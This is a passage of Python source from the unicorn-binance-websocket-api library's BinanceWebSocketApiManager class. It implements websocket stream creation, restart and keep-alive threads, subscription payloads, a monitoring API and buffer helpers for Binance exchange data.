if "!userData" in active_stream_list[stream_id]['markets'] or \
"!userData" in active_stream_list[stream_id]['channels']:
if (active_stream_list[stream_id]['start_time'] + active_stream_list[stream_id]['listen_key_cache_time']) \
< time.time() and (active_stream_list[stream_id]['last_static_ping_listen_key'] +
active_stream_list[stream_id]['listen_key_cache_time']) < time.time():
# keep-alive the listenKey
self.restclient.keepalive_listen_key(stream_id)
# set last_static_ping_listen_key
self.stream_list[stream_id]['last_static_ping_listen_key'] = time.time()
self.set_heartbeat(stream_id)
logging.info("BinanceWebSocketApiManager._frequent_checks() - sent listen_key keepalive "
"ping for stream_id=" + str(stream_id))
sys.exit(0)
def _keepalive_streams(self):
"""
This method is started as a thread and is observing the streams, if neccessary it restarts a dead stream
"""
keepalive_streams_id = time.time()
self.keepalive_streams_list[keepalive_streams_id] = {'last_heartbeat': 0,
'stop_request': None,
'has_stopped': False}
logging.info(
"BinanceWebSocketApiManager._keepalive_streams() new instance created with keepalive_streams_id=" +
str(keepalive_streams_id))
# threaded loop to restart crashed streams:
while self.stop_manager_request is None and \
self.keepalive_streams_list[keepalive_streams_id]['stop_request'] is None:
time.sleep(1)
self.keepalive_streams_list[keepalive_streams_id]['last_heartbeat'] = time.time()
# restart streams with a restart_request (status == new)
temp_restart_requests = copy.deepcopy(self.restart_requests)
for stream_id in temp_restart_requests:
try:
# find restarts that didnt work
if self.restart_requests[stream_id]['status'] == "restarted" and \
self.restart_requests[stream_id]['last_restart_time']+self.restart_timeout < time.time():
self.restart_requests[stream_id]['status'] = "new"
# restart streams with requests
if self.restart_requests[stream_id]['status'] == "new" or \
self.stream_list[stream_id]['kill_request'] is True:
self.kill_stream(stream_id)
thread = threading.Thread(target=self._restart_stream_thread, args=(stream_id,))
thread.start()
except KeyError:
pass
sys.exit(0)
def _restart_stream(self, stream_id):
"""
This is NOT stop/start! Its purpose is to start a died stream again! Use `set_restart_request()` for stop/start!
:param stream_id: id of a stream
:type stream_id: uuid
:return: stream_id or False
"""
try:
if self.restart_requests[stream_id]['status'] != "new":
logging.warning("BinanceWebSocketApiManager._restart_stream() please use `set_restart_request()` "
"instead!")
return False
except KeyError:
# no restart_request entry for this stream_id:
logging.warning("BinanceWebSocketApiManager._restart_stream() please use `set_restart_request() instead!")
return False
logging.info("BinanceWebSocketApiManager._restart_stream(" + str(stream_id) + ", " +
str(self.stream_list[stream_id]['channels']) +
", " + str(self.stream_list[stream_id]['markets']) + ")")
self.restart_requests[stream_id] = {'status': "restarted"}
self.restart_requests[stream_id]['last_restart_time'] = time.time()
self.stream_list[stream_id]['status'] = "restarting"
self.stream_list[stream_id]['kill_request'] = None
self.stream_list[stream_id]['payload'] = []
try:
loop = asyncio.new_event_loop()
except OSError as error_msg:
logging.critical(f"BinanceWebSocketApiManager.create_stream({str(stream_id)}) - OSError - "
f"error_msg: {str(error_msg)}")
return False
thread = threading.Thread(target=self._create_stream_thread,
args=(loop,
stream_id,
self.stream_list[stream_id]['channels'],
self.stream_list[stream_id]['markets'],
self.stream_list[stream_id]['stream_buffer_name'],
True))
thread.start()
return stream_id
def _restart_stream_thread(self, stream_id):
"""
Wait till the old socket has closed and then start it again
:param stream_id: id of a stream
:type stream_id: uuid
"""
self._restart_stream(stream_id)
def _start_monitoring_api_thread(self, host, port, warn_on_update):
"""
Threaded method that servces the monitoring api
:param host: IP or hostname to use
:type host: str
:param port: Port to use
:type port: int
:param warn_on_update: Should the monitoring system report available updates?
:type warn_on_update: bool
"""
logging.info("BinanceWebSocketApiManager._start_monitoring_api_thread() - Starting monitoring API service ...")
app = Flask(__name__)
@app.route('/')
@app.route('/status/')
def redirect_to_wiki():
logging.info("BinanceWebSocketApiManager._start_monitoring_api_thread() 200 - "
"Visit https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/UNICORN-"
"Monitoring-API-Service for further information!")
return redirect("https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/"
"UNICORN-Monitoring-API-Service", code=302)
api = Api(app)
api.add_resource(BinanceWebSocketApiRestServer,
"/status/<string:statusformat>/",
"/status/<string:statusformat>/<string:checkcommandversion>",
resource_class_kwargs={'handler_binance_websocket_api_manager': self,
'warn_on_update': warn_on_update})
try:
dispatcher = wsgi.PathInfoDispatcher({'/': app})
self.monitoring_api_server = wsgi.WSGIServer((host, port), dispatcher)
self.monitoring_api_server.start()
except RuntimeError as error_msg:
logging.critical("BinanceWebSocketApiManager._start_monitoring_api_thread() - Monitoring API service is "
"going down! - Info: " + str(error_msg))
except OSError as error_msg:
logging.critical("BinanceWebSocketApiManager._start_monitoring_api_thread() - Monitoring API service is "
"going down! - Info: " + str(error_msg))
def add_to_ringbuffer_error(self, error):
"""
Add received error messages from websocket endpoints to the error ringbuffer
:param error: The data to add.
:type error: string
:return: bool
"""
while len(self.ringbuffer_error) >= self.get_ringbuffer_error_max_size():
self.ringbuffer_error.pop(0)
self.ringbuffer_error.append(str(error))
return True
def add_to_ringbuffer_result(self, result):
"""
Add received result messages from websocket endpoints to the result ringbuffer
:param result: The data to add.
:type result: string
:return: bool
"""
while len(self.ringbuffer_result) >= self.get_ringbuffer_result_max_size():
self.ringbuffer_result.pop(0)
self.ringbuffer_result.append(str(result))
return True
def add_to_stream_buffer(self, stream_data, stream_buffer_name=False):
"""
Kick back data to the
`stream_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
If it is not possible to process received stream data (for example, the database is restarting, so its not
possible to save the data), you can return the data back into the stream_buffer. After a few seconds you stopped
writing data back to the stream_buffer, the BinanceWebSocketApiManager starts flushing back the data to normal
processing.
:param stream_data: the data you want to write back to the buffer
:type stream_data: raw stream_data or unicorn_fied stream data
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:return: bool
"""
if stream_buffer_name is False:
with self.stream_buffer_lock:
self.stream_buffer.append(stream_data)
else:
with self.stream_buffer_locks[stream_buffer_name]:
self.stream_buffers[stream_buffer_name].append(stream_data)
self.last_entry_added_to_stream_buffer = time.time()
return True
def add_to_stream_signal_buffer(self, signal_type=False, stream_id=False, data_record=False):
"""
Add signals about a stream to the
`stream_signal_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_signal_buffer%60>`_
:param signal_type: the data you want to write back to the buffer
:type signal_type: raw stream_data or unicorn_fied stream data
:param stream_id: id of a stream
:type stream_id: uuid
:param data_record: The last or first received data record
:type data_record: str or dict
:return: bool
"""
if self.enable_stream_signal_buffer:
stream_signal = {'type': signal_type,
'stream_id': stream_id,
'timestamp': time.time()}
if signal_type == "CONNECT":
# nothing to add ...
pass
elif signal_type == "DISCONNECT":
try:
stream_signal['last_received_data_record'] = self.stream_list[stream_id]['last_received_data_record']
except KeyError as error_msg:
logging.critical(f"BinanceWebSocketApiManager.add_to_stream_signal_buffer({signal_type}) - "
f"Cant determine last_received_data_record! - error_msg: {error_msg}")
stream_signal['last_received_data_record'] = None
elif signal_type == "FIRST_RECEIVED_DATA":
stream_signal['first_received_data_record'] = data_record
else:
logging.error(f"BinanceWebSocketApiManager.add_to_stream_signal_buffer({signal_type}) - "
f"Received invalid `signal_type`!")
return False
with self.stream_signal_buffer_lock:
self.stream_signal_buffer.append(stream_signal)
logging.info(f"BinanceWebSocketApiManager.add_to_stream_signal_buffer({stream_signal})")
return True
else:
return False
def add_total_received_bytes(self, size):
"""
Add received bytes to the total received bytes statistic
:param size: int value of added bytes
:type size: int
"""
with self.total_received_bytes_lock:
self.total_received_bytes += int(size)
def create_payload(self, stream_id, method, channels=False, markets=False):
"""
Create the payload for subscriptions
:param stream_id: provide a stream_id
:type stream_id: uuid
:param method: `SUBSCRIBE` or `UNSUBSCRIBE`
:type method: str
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:return: payload (list) or False
"""
logging.info("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", " + str(channels) + ", " +
str(markets) + ") started ...")
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
payload = []
if self.is_exchange_type("dex"):
if method == "subscribe" and channels is not False:
for channel in channels:
add_payload = {"method": method,
"topic": channel}
symbols = []
if channel == "allMiniTickers" or \
channel == "allTickers" or \
channel == "blockheight":
add_payload["symbols"] = ["$all"]
payload.append(add_payload)
continue
if markets:
for market in markets:
if market == "allMiniTickers" or \
market == "allTickers" or \
market == "blockheight":
add_payload_from_market = {"method": method,
"topic": market,
"symbols": ["$all"]}
payload.append(add_payload_from_market)
continue
elif re.match(r'[a-zA-Z0-9]{41,43}', market) is not None:
if self.stream_list[stream_id]['dex_user_address'] is False:
self.stream_list[stream_id]['dex_user_address'] = market
else:
symbols.append(market)
try:
if self.stream_list[stream_id]["dex_user_address"] is not False:
add_payload["address"] = self.stream_list[stream_id]["dex_user_address"]
payload.append(add_payload)
except KeyError:
pass
if len(symbols) > 0:
add_payload["symbols"] = symbols
payload.append(add_payload)
elif method == "unsubscribe":
if markets:
add_payload = {"method": method}
for market in markets:
if re.match(r'[a-zA-Z0-9]{41,43}', market) is not None:
if self.stream_list[stream_id]['dex_user_address'] is False:
self.stream_list[stream_id]['dex_user_address'] = market
markets.remove(market)
if len(markets) > 0:
add_payload["symbols"] = markets
payload.append(add_payload)
if channels:
for channel in channels:
add_payload = {"method": method,
"topic": channel}
payload.append(add_payload)
else:
logging.critical("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", "
+ str(channels) + ", " + str(markets) + ") - Allowed values for `method`: `subscribe` "
"or `unsubscribe`!")
return False
elif self.is_exchange_type("cex"):
final_market = "@arr"
if markets:
for market in markets:
if "arr@" in market:
final_market = "@" + market
final_channel = "@arr"
if channels:
for channel in channels:
if "arr@" in channel:
final_channel = "@" + channel
if method == "subscribe":
params = []
for channel in channels:
if "!" in channel:
params.append(channel + final_market)
continue
else:
for market in markets:
if "!" in market:
params.append(market + final_channel)
else:
params.append(market.lower() + "@" + channel)
if len(params) > 0:
params = list(set(params))
payload = self.split_payload(params, "SUBSCRIBE")
elif method == "unsubscribe":
if markets:
params = []
try:
for channel in self.stream_list[stream_id]['channels']:
if "!" in channel:
params.append(channel + final_market)
else:
for market in markets:
params.append(market.lower() + "@" + channel)
if len(params) > 0:
payload = self.split_payload(params, "UNSUBSCRIBE")
except KeyError:
pass
if channels:
params = []
for market in self.stream_list[stream_id]['markets']:
if "!" in market:
params.append(market + final_channel)
else:
for channel in channels:
params.append(market.lower() + "@" + channel)
if len(params) > 0:
payload = self.split_payload(params, "UNSUBSCRIBE")
else:
logging.critical("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", "
+ str(channels) + ", " + str(markets) + ") - Allowed values for `method`: `subscribe` "
"or `unsubscribe`!")
return False
logging.info("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", "
+ str(channels) + ", " + str(markets) + ") - Payload: " + str(payload))
logging.info("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", " + str(channels) + ", " +
str(markets) + ") finished ...")
return payload
def create_stream(self,
channels,
markets, stream_label=None,
stream_buffer_name=False,
api_key=False,
api_secret=False,
symbols=False,
output=False,
ping_interval=20,
ping_timeout=20,
close_timeout=10):
"""
Create a websocket stream
If you provide 2 markets and 2 channels, then you are going to create 4 subscriptions (markets * channels).
Example:
channels = ['trade', 'kline_1']
markets = ['bnbbtc', 'ethbtc']
Finally: bnbbtc@trade, ethbtc@trade, bnbbtc@kline_1, ethbtc@kline_1
`There is a limit of 1024 subscriptions per stream.
<https://github.com/binance-exchange/binance-official-api-docs/blob/5fccfd572db2f530e25e302c02be5dec12759cf9/CHANGELOG.md#2020-04-23>`_
Create `!userData` streams as single streams, because its using a different endpoint and can not get combined
with other streams in a multiplexed stream!
Example CEX:
``binance_websocket_api_manager.create_stream(["arr"], ["!userData"], api_key="aaa", api_secret="bbb")``
Isolated Margin:
``binance_websocket_api_manager.create_stream(["arr"], ["!userData"], api_key="aaa", api_secret="bbb", symbols="ankrbtc")``
Example DEX:
``binance_websocket_api_manager.create_stream(['orders', 'transfers', 'accounts'], binance_dex_user_address)``
To create a multiplexed stream which includes also `!miniTicker@arr`, `!ticker@arr`, `!forceOrder@arr` or
`!bookTicker@arr` you just need to add `!bookTicker` to the channels list - dont add `arr` (cex) or `$all`
(dex) to the markets list.
Example:
``binance_websocket_api_manager.create_stream(['kline_5m', 'marketDepth', '!miniTicker'], ['bnbbtc'])``
But you have to add `arr` or `$all` if you want to start it as a single stream!
Example:
``binance_websocket_api_manager.create_stream(["arr"], ["!miniTicker"])``
:param channels: provide the channels you wish to stream
:type channels: str, tuple, list, set
:param markets: provide the markets you wish to stream
:type markets: str, tuple, list, set
:param stream_label: provide a stream_label to identify the stream
:type stream_label: str
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:param output: the default setting `raw_data` can be globaly overwritten with the parameter
`output_default <https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html?highlight=output_default#module-unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager>`_
of BinanceWebSocketApiManager`. To overrule the `output_default` value for this specific stream,
set `output` to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to
convert with `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ - otherwise with
the default setting "raw_data" the output remains unchanged and gets delivered as received from
the endpoints
:type output: str
:param ping_interval: Once the connection is open, a `Ping frame` is sent every
`ping_interval` seconds. This serves as a keepalive. It helps keeping
the connection open, especially in the presence of proxies with short
timeouts on inactive connections. Set `ping_interval` to `None` to
disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type ping_interval: int or None
:param ping_timeout: If the corresponding `Pong frame` isn't received within
`ping_timeout` seconds, the connection is considered unusable and is closed with
code 1011. This ensures that the remote endpoint remains responsive. Set
`ping_timeout` to `None` to disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type ping_timeout: int or None
:param close_timeout: The `close_timeout` parameter defines a maximum wait time in seconds for
completing the closing handshake and terminating the TCP connection. (default: 10)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type close_timeout: int or None
:return: stream_id or 'False'
"""
# create a stream
if isinstance(channels, bool):
logging.error(f"BinanceWebSocketApiManager.create_stream(" + str(channels) + ", " + str(markets) + ", "
+ str(stream_label) + ", " + str(stream_buffer_name) + ", " + str(symbols) + ") - Parameter "
f"`channels` must be str, tuple, list or a set!")
return False
elif isinstance(markets, bool):
logging.error(f"BinanceWebSocketApiManager.create_stream(" + str(channels) + ", " + str(markets) + ", "
+ str(stream_label) + ", " + str(stream_buffer_name) + ", " + str(symbols) + ") - Parameter "
f"`markets` must be str, tuple, list or a set!")
return False
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
if output is False:
output = self.output_default
stream_id = uuid.uuid4()
markets_new = []
if stream_buffer_name is True:
stream_buffer_name = stream_id
for market in markets:
if "!" in market \
or market == "allMiniTickers" \
or market == "allTickers" \
or market == "blockheight" \
or market == "$all":
markets_new.append(market)
else:
if self.is_exchange_type('dex'):
if re.match(r'[a-zA-Z0-9]{41,43}', market) is None:
markets_new.append(str(market).upper())
else:
markets_new.append(str(market))
elif self.is_exchange_type('cex'):
markets_new.append(str(market).lower())
logging.info("BinanceWebSocketApiManager.create_stream(" + str(channels) + ", " + str(markets_new) + ", "
+ str(stream_label) + ", " + str(stream_buffer_name) + ", " + str(symbols) + ") with stream_id="
+ str(stream_id))
self._add_stream_to_stream_list(stream_id,
channels,
markets_new,
stream_label,
stream_buffer_name,
symbols=symbols,
api_key=api_key,
api_secret=api_secret,
output=output,
ping_interval=ping_interval,
ping_timeout=ping_timeout,
close_timeout=close_timeout)
try:
loop = asyncio.new_event_loop()
except OSError as error_msg:
logging.critical(f"BinanceWebSocketApiManager.create_stream({str(channels)}, {str(markets_new)}, "
f"{str(stream_label)}, {str(stream_buffer_name)}, {str(symbols)}) with stream_id="
f"{str(stream_id)} - OSError - can not create stream - error_msg: {str(error_msg)}")
return False
thread = threading.Thread(target=self._create_stream_thread, args=(loop,
stream_id,
channels,
markets_new,
stream_buffer_name,
False))
thread.start()
return stream_id
def create_websocket_uri(self, channels, markets, stream_id=False, api_key=False, api_secret=False, symbols=False):
"""
Create a websocket URI
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:param stream_id: provide a stream_id (only needed for userData Streams (acquiring a listenKey)
:type stream_id: uuid
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:return: str or False
"""
if isinstance(channels, bool):
logging.error(f"BinanceWebSocketApiManager.create_websocket_uri({str(channels)}, {str(markets)}"
f", {str(symbols)}) - error_msg: Parameter `channels` must be str, tuple, list "
f"or a set!")
return False
elif isinstance(markets, bool):
logging.error(f"BinanceWebSocketApiManager.create_websocket_uri({str(channels)}, {str(markets)}"
f", {str(symbols)}) - error_msg: Parameter `markets` must be str, tuple, list "
f"or a set!")
return False
payload = []
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
if len(channels) == 1 and len(markets) == 1:
if "!userData" in channels or "!userData" in markets:
if stream_id is not False:
response = self.get_listen_key_from_restclient(stream_id, api_key, api_secret, symbols=symbols)
try:
if response['code'] == -1102 or \
response['code'] == -2008 or \
response['code'] == -2014 or \
response['code'] == -2015 or \
response['code'] == -11001:
# -1102 = Mandatory parameter 'symbol' was not sent, was empty/null, or malformed.
# -2008 = Invalid Api-Key ID
# -2014 = API-key format invalid
# -2015 = Invalid API-key, IP, or permissions for action
# -11001 = Isolated margin account does not exist.
logging.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + ", " + str(symbols) + ") - Received known "
"error code from rest client: " + str(response))
return response
else:
logging.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + ", " + str(symbols) + ") - Received unknown "
"error code from rest client: " + str(response))
return response
except KeyError:
pass
except TypeError:
pass
if response:
try:
uri = self.websocket_base_uri + "ws/" + str(response['listenKey'])
uri_hidden_secret = self.websocket_base_uri + "ws/" + self.replaced_secrets_text
if self.show_secrets_in_logs is True:
logging.info("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + str(symbols) + ") - result: " + uri)
else:
logging.info("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + str(symbols) + ") - result: " +
uri_hidden_secret)
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return uri
except KeyError:
logging.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", "
+ str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not "
"create URI!!")
return False
except TypeError:
logging.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", "
+ str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not "
"create URI!!")
return False
else:
logging.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not create "
"URI!!")
return False
else:
logging.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not create URI!!")
return False
elif "!bookTicker" in channels or "!bookTicker" in markets:
if stream_id:
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/!bookTicker"
elif "arr" in channels or "$all" in markets:
if stream_id:
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/" + markets[0] + "@" + channels[0]
elif "arr" in markets or "$all" in channels:
if stream_id:
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/" + channels[0] + "@" + markets[0]
elif self.is_exchange_type("dex"):
if re.match(r'[a-zA-Z0-9]{41,43}', markets[0]) is not None:
try:
if self.stream_list[stream_id]['dex_user_address'] is False:
self.stream_list[stream_id]['dex_user_address'] = markets[0]
if self.stream_list[stream_id]['dex_user_address'] != markets[0]:
logging.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Error: once set, the "
"dex_user_address is not allowed to get changed anymore!")
return False
except KeyError:
pass
add_payload = {"method": "subscribe",
"topic": channels[0],
"address": markets[0]}
payload.append(add_payload)
if stream_id:
self.stream_list[stream_id]['payload'] = payload
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/" + markets[0]
elif markets[0] != "" and channels[0] != "":
return self.websocket_base_uri + "ws/" + markets[0] + "@" + channels[0]
else:
logging.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Error: not able to create websocket "
"URI for DEX")
return False
if self.is_exchange_type("dex"):
query = "ws"
if stream_id:
payload = self.create_payload(stream_id, "subscribe", channels=channels, markets=markets)
self.stream_list[stream_id]['payload'] = payload
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + str(query)
else:
query = "stream?streams="
final_market = "@arr"
market = ""
channel = ""
for market in markets:
if "arr@" in market:
final_market = "@" + market
final_channel = "@arr"
for channel in channels:
if "arr@" in channel:
final_channel = "@" + channel
for channel in channels:
if channel == "!userData":
logging.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Can not create "
"'outboundAccountInfo' in a multi channel socket! "
"Unfortunately Binance only stream it in a single stream socket! ./"
"Use binance_websocket_api_manager.create_stream([\"arr\"], [\"!userData\"]) to "
"initiate an extra connection.")
return False
for market in markets:
if market == "!userData":
logging.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Can not create "
"'outboundAccountInfo' in a multi channel socket! "
"Unfortunatly Binance only stream it in a single stream socket! ./"
"Use binance_websocket_api_manager.create_stream([\"arr\"], [\"!userData\"]) to "
"initiate an extra connection.")
return False
if "!" in channel:
query += channel + final_market
elif "!" in market:
query += market + final_channel
else:
query += market.lower() + "@" + channel
try:
if self.subscribe_to_stream(stream_id, markets=markets, channels=channels) is False:
sys.exit(1)
except KeyError:
pass
logging.info("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Created websocket URI for stream_id=" +
str(stream_id) + " is " + self.websocket_base_uri + str(query))
return self.websocket_base_uri + str(query)
def delete_listen_key_by_stream_id(self, stream_id):
"""
Delete a binance listen_key from a specific !userData stream
:param stream_id: id of a !userData stream
:type stream_id: uuid
"""
try:
if self.stream_list[stream_id]['listen_key'] is not False:
logging.info("BinanceWebSocketApiManager.delete_listen_key_by_stream_id(" + str(stream_id) + ")")
self.restclient.delete_listen_key(stream_id)
except KeyError:
return False
def delete_stream_from_stream_list(self, stream_id):
"""
Delete a stream from the stream_list
Even if a stream crashes or get stopped, its data remains in the BinanceWebSocketApiManager till you stop the
BinanceWebSocketApiManager itself. If you want to tidy up the stream_list you can use this method.
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
logging.info("BinanceWebSocketApiManager.delete_stream_from_stream_list(" + str(stream_id) + ")")
return self.stream_list.pop(stream_id, False)
def fill_up_space_left(self, demand_of_chars, string, filling=" "):
"""
Add whitespaces to `string` to a length of `demand_of_chars` on the left side
:param demand_of_chars: how much chars does the string have to have?
:type demand_of_chars: int
:param string: the string that has to get filled up with spaces
:type string: str
:param filling: filling char (default: blank space)
:type filling: str
:return: the filled up string
"""
blanks_pre = ""
blanks_post = ""
demand_of_blanks = demand_of_chars - len(str(string)) - 1
while len(blanks_pre) < demand_of_blanks:
blanks_pre += filling
blanks_post = filling
return blanks_pre + str(string) + blanks_post
def fill_up_space_centered(self, demand_of_chars, string, filling=" "):
"""
Add whitespaces to `string` to a length of `demand_of_chars`
:param demand_of_chars: how much chars does the string have to have?
:type demand_of_chars: int
:param string: the string that has to get filled up with spaces
:type string: str
:param filling: filling char (default: blank space)
:type filling: str
:return: the filled up string
"""
blanks_pre = ""
blanks_post = ""
demand_of_blanks = demand_of_chars - len(str(string)) - 1
while (len(blanks_pre)+len(blanks_post)) < demand_of_blanks:
blanks_pre += filling
if (len(blanks_pre) + len(blanks_post)) < demand_of_blanks:
blanks_post += filling
return blanks_pre + str(string) + blanks_post
def fill_up_space_right(self, demand_of_chars, string, filling=" "):
"""
Add whitespaces to `string` to a length of `demand_of_chars` on the right side
:param demand_of_chars: how much chars does the string have to have?
:type demand_of_chars: int
:param string: the string that has to get filled up with spaces
:type string: str
:param filling: filling char (default: blank space)
:type filling: str
:return: the filled up string
"""
blanks_pre = " "
blanks_post = ""
demand_of_blanks = demand_of_chars - len(str(string))
while len(blanks_post) < demand_of_blanks-1:
blanks_pre = filling
blanks_post += filling
string = blanks_pre + str(string) + blanks_post
return string[0:demand_of_chars]
def get_active_stream_list(self):
"""
Get a list of all active streams
:return: set or False
"""
# get the stream_list without stopped and crashed streams
stream_list_with_active_streams = {}
for stream_id in self.stream_list:
if self.stream_list[stream_id]['status'] == "running":
stream_list_with_active_streams[stream_id] = self.stream_list[stream_id]
try:
if len(stream_list_with_active_streams) > 0:
return stream_list_with_active_streams
except KeyError:
return False
except UnboundLocalError:
return False
def get_all_receives_last_second(self):
"""
Get the number of all receives of the last second
:return: int
"""
all_receives_last_second = 0
last_second_timestamp = int(time.time()) - 1
for stream_id in self.stream_list:
try:
all_receives_last_second += self.stream_list[stream_id]['receives_statistic_last_second']['entries'][
last_second_timestamp]
except KeyError:
pass
return all_receives_last_second
def get_errors_from_endpoints(self):
"""
Get all the stored error messages from the ringbuffer sent by the endpoints.
:return: list
"""
return self.ringbuffer_error
def get_binance_api_status(self):
"""
Get used_weight, last status_code and the timestamp of the last status update
:return: dict
"""
return self.binance_api_status
def get_current_receiving_speed(self, stream_id):
"""
Get the receiving speed of the last second in Bytes
:return: int
"""
current_timestamp = int(time.time())
last_timestamp = current_timestamp - 1
try:
if self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][last_timestamp] > 0:
self.stream_list[stream_id]['transfer_rate_per_second']['speed'] = \
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][last_timestamp]
except TypeError:
return 0
except KeyError:
return 0
try:
current_receiving_speed = self.stream_list[stream_id]['transfer_rate_per_second']['speed']
except KeyError:
current_receiving_speed = 0
return current_receiving_speed
def get_current_receiving_speed_global(self):
"""
Get the receiving speed of the last second in Bytes from all streams!
:return: int
"""
current_receiving_speed = 0
try:
temp_stream_list = copy.deepcopy(self.stream_list)
except RuntimeError as error_msg:
logging.debug(f"BinanceWebSocketApiManager.get_current_receiving_speed_global() - RuntimeError: "
f"{str(error_msg)}")
return 0
for stream_id in temp_stream_list:
current_receiving_speed += self.get_current_receiving_speed(stream_id)
return current_receiving_speed
@staticmethod
def get_date_of_timestamp(timestamp):
"""
Convert a timestamp into a readable date/time format for humans
:param timestamp: provide the timestamp you want to convert into a date
:type timestamp: timestamp
:return: str
"""
date = str(datetime.utcfromtimestamp(timestamp).strftime('%Y-%m-%d, %H:%M:%S UTC'))
return date
def get_exchange(self):
"""
Get the name of the used exchange like "binance.com" or "binance.org-testnet"
:return: str
"""
return self.exchange
@staticmethod
def get_human_bytesize(bytes, suffix=""):
"""
Convert the bytes to something readable
:param bytes: amount of bytes
:type bytes: int
:param suffix: add a string after
:type suffix: str
:return:
"""
if bytes > 1024 * 1024 * 1024 *1024:
bytes = str(round(bytes / (1024 * 1024 * 1024 * 1024), 3)) + " tB" + suffix
elif bytes > 1024 * 1024 * 1024:
bytes = str(round(bytes / (1024 * 1024 * 1024), 2)) + " gB" + suffix
elif bytes > 1024 * 1024:
bytes = str(round(bytes / (1024 * 1024), 2)) + " mB" + suffix
elif bytes > 1024:
bytes = str(round(bytes / 1024, 2)) + " kB" + suffix
else:
bytes = str(bytes) + " B" + suffix
return bytes
@staticmethod
def get_human_uptime(uptime):
"""
Convert a timespan of seconds into hours, days, ...
:param uptime: Uptime in seconds
:type uptime: int
:return:
"""
if uptime > (60 * 60 * 24):
uptime_days = int(uptime / (60 * 60 * 24))
uptime_hours = int(((uptime - (uptime_days * (60 * 60 * 24))) / (60 * 60)))
uptime_minutes = int((uptime - ((uptime_days * (60 * 60 * 24)) + (uptime_hours * 60 * 60))) / 60)
uptime_seconds = int(
uptime - ((uptime_days * (60 * 60 * 24)) + ((uptime_hours * (60 * 60)) + (uptime_minutes * 60))))
